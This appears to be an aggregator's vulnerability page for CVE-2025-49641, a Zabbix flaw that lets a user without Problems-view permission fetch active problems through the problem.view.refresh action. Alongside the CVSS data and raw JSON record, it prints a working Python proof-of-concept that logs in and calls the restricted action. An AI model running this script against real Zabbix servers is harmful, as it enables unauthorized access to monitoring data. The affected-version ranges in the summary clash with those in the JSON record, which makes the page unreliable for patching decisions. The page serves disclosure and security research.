Security Vulnerability Report
中文
CVE-2025-49641 CVSS 4.3 MEDIUM

CVE-2025-49641

Published: 2025-10-03 12:15:44
Last Modified: 2025-10-08 14:55:00

Description

A regular Zabbix user with no permission to the Monitoring -> Problems view is still able to call the problem.view.refresh action and therefore still retrieve a list of active problems.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* - VULNERABLE
Zabbix < 7.0.21
Zabbix 7.4.x < 7.4.4
Zabbix 6.0.x < 6.0.35

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-49641 PoC - Zabbix problem.view.refresh Authorization Bypass # This PoC demonstrates how a low-privileged Zabbix user can retrieve # active problems list without having permission to Monitoring -> Problems view. import requests import json # Configuration ZABBIX_URL = "https://target-zabbix-server.com" USERNAME = "low_priv_user" PASSWORD = "user_password" # Step 1: Login to Zabbix to obtain session cookie session = requests.Session() login_payload = { "name": USERNAME, "password": PASSWORD, "enter": "Sign in" } # Perform login login_url = f"{ZABBIX_URL}/index.php" response = session.post(login_url, data=login_payload) # Step 2: Call problem.view.refresh action to retrieve active problems # This action should be restricted, but due to CVE-2025-49641, # it can be called by any authenticated user refresh_payload = { "action": "problem.view.refresh", "csrf_token": "valid_csrf_token_here" } # Send the request to retrieve problems refresh_url = f"{ZABBIX_URL}/zabbix.php?action=problem.view.refresh" response = session.post(refresh_url, data=refresh_payload) # Step 3: Parse the response if response.status_code == 200: try: problems_data = response.json() print("Successfully retrieved active problems:") print(json.dumps(problems_data, indent=2)) except json.JSONDecodeError: print("Response:", response.text) else: print(f"Request failed with status code: {response.status_code}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-49641", "sourceIdentifier": "[email protected]", "published": "2025-10-03T12:15:44.380", "lastModified": "2025-10-08T14:55:00.363", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A regular Zabbix user with no permission to the Monitoring -> Problems view is still able to call the problem.view.refresh action and therefore still retrieve a list of active problems."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.0.41", "matchCriteriaId": "EB51CE02-E39D-402B-A2A4-ABDC678D44F6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.18", "matchCriteriaId": "9F4CE82D-66AF-4C88-925B-1B5CF1D0F174"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.2.0", "versionEndExcluding": "7.2.12", "matchCriteriaId": "919D7232-739F-44E7-A491-FB4BFEC8D294"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.2", "matchCriteriaId": "02FECC41-6BFA-43DB-8BC0-0317085195AC"}]}]}], "references": [{"url": "https://support.zabbix.com/browse/ZBX-27063", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}